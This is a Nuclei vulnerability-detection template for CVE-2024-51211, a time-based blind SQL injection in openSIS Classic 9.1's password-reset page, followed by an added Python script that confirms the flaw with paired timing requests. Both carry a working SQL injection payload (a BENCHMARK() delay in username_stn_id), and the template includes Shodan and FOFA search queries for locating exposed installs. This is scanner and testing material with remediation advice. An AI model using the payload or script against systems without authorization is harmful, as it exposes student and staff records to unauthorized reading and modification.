id: CVE-2024-51211

info:
  name: openSIS Classic v9.1 - SQL Injection
  author: Haliteroglu
  severity: critical
  description: |
    OS4ED openSIS Classic 9.1 is vulnerable to a time-based blind SQL injection in ResetUserInfo.php.
    The username_stn_id parameter of the password-reset form is used in a SQL query without
    validation or parameterization, so an unauthenticated attacker can inject arbitrary SQL commands.
  impact: |
    An unauthenticated attacker can execute arbitrary SQL against the application's database,
    reading or modifying student, staff and account records. The flaw is confirmed here by making
    the database evaluate BENCHMARK() and measuring the resulting delay in the response.
  remediation: |
    Update openSIS Classic to a release that fixes CVE-2024-51211. Until then, rewrite the query in
    ResetUserInfo.php to use a prepared statement with a bound parameter for username_stn_id, and
    restrict network access to the password-reset endpoint.
  reference:
    - https://github.com/kutsa1/My-CVE/tree/main/CVE-2024-51211
    - https://nvd.nist.gov/vuln/detail/CVE-2024-51211
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-51211
    cwe-id: CWE-89
    epss-score: 0.0406
    epss-percentile: 0.8873
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="openSIS"
    shodan-query: title:"openSIS"
  tags: cve,cve2024,sqli,opensis,time-based-sqli,vkev,vuln

http:
  - raw:
      - |
        @timeout: 30s
        GET /ResetUserInfo.php?user_type_form=username&uname_user_type=uname_student&username_stn_id=21+OR+3720%3dBENCHMARK(7000000,MD5(0x6e48446e))&pass=1&month_username_dob=x&day_username_dob=x&year_username_dob=x HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=7"
          - "contains_all(tolower(body), 'forgotpass.php', 'opensis')"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100e9f4e7ddbaeccdbdbea28da630ff6975656f6bb118ee6b48f0a0da62c1db65a7022100814509c8b443ac5772a9258fbf09aa155f8d9b39f268880735ecd79bf97a8604:922c64590222798bb761d5b6d8e72950
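The template above fires on a single request whose only timing reference is the fixed `duration>=7` threshold, so a slow or overloaded host can produce a false positive and a fast one a false negative. The following is an added example, not code from the template author or from the nuclei project: a stand-alone Python checker that sends the same GET to the same path and parameters, but pairs every injected request with a benign control request for `username_stn_id` and only reports the flaw when the injected one is consistently slower and the response still looks like the openSIS reset page. `http_send` and `simulated_server` are assumed helper names; the simulated server is a constructed stand-in that sleeps when it sees `BENCHMARK`, so the block runs offline.

```python
"""Paired-timing confirmation of the openSIS ResetUserInfo.php SQLi (CVE-2024-51211)."""
import time
import urllib.error
import urllib.parse
import urllib.request

# Path, parameter names and payload are copied from the template request.
PATH = "/ResetUserInfo.php"
PARAM = "username_stn_id"
BASE_PARAMS = {
    "user_type_form": "username",
    "uname_user_type": "uname_student",
    "pass": "1",
    "month_username_dob": "x",
    "day_username_dob": "x",
    "year_username_dob": "x",
}
# 7,000,000 MD5 rounds inside BENCHMARK() keeps MySQL busy for several seconds.
PAYLOAD = "21 OR 3720=BENCHMARK(7000000,MD5(0x6e48446e))"
# Control value: same request shape, no injected SQL, so it measures normal latency.
CONTROL = "21"


def build_query(value: str) -> str:
    """Return PATH plus the URL-encoded query string with PARAM set to value."""
    params = dict(BASE_PARAMS)
    params[PARAM] = value
    return PATH + "?" + urllib.parse.urlencode(params)


def http_send(base_url: str, timeout: float = 30.0):
    """Real sender (assumed helper): returns a callable that fetches base_url + query."""
    def send(query: str):
        req = urllib.request.Request(base_url.rstrip("/") + query,
                                     headers={"User-Agent": "cve-2024-51211-check"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:  # non-2xx still carries a body
            return err.code, err.read().decode("utf-8", "replace")
    return send


def timed(send, value: str):
    """Send one request with PARAM=value and return (seconds, status, body)."""
    start = time.perf_counter()
    status, body = send(build_query(value))
    return time.perf_counter() - start, status, body


def looks_like_opensis(status: int, body: str) -> bool:
    """Same body/status conditions as the template's matcher."""
    lower = body.lower()
    return status == 200 and "forgotpass.php" in lower and "opensis" in lower


def confirm(send, min_delay: float = 7.0, rounds: int = 2) -> bool:
    """True only if, in every round, the injected request is at least min_delay
    seconds slower than the control request sent just before it and the
    response still looks like the openSIS reset page."""
    for _ in range(rounds):
        base_time, _, _ = timed(send, CONTROL)
        inj_time, status, body = timed(send, PAYLOAD)
        if not looks_like_opensis(status, body):
            return False
        if inj_time - base_time < min_delay:
            return False
    return True


def simulated_server(delay: float = 0.05):
    """Constructed stand-in for a vulnerable install (assumed helper, not a real
    response): sleeps when BENCHMARK reaches the query, always serves a page
    carrying the two markers the matcher looks for."""
    page = "<title>openSIS</title><a href='ForgotPass.php'>Forgot Password?</a>"

    def send(query: str):
        if "BENCHMARK" in urllib.parse.unquote_plus(query):
            time.sleep(delay)
        return 200, page
    return send


if __name__ == "__main__":
    # Offline demo against the simulated server; against a real target use
    # confirm(http_send("http://target"), min_delay=7.0).
    print("vulnerable:", confirm(simulated_server(), min_delay=0.03))
```

The control request is what makes the verdict trustworthy: the delta is measured against the host's own latency on the same endpoint a moment earlier, so a target that simply takes eight seconds to answer anything does not register, and `rounds` guards against a single network hiccup. BENCHMARK() cost scales with the database server's CPU, so on a fast host lower `min_delay` (or raise the iteration count in `PAYLOAD`) rather than trusting one measurement.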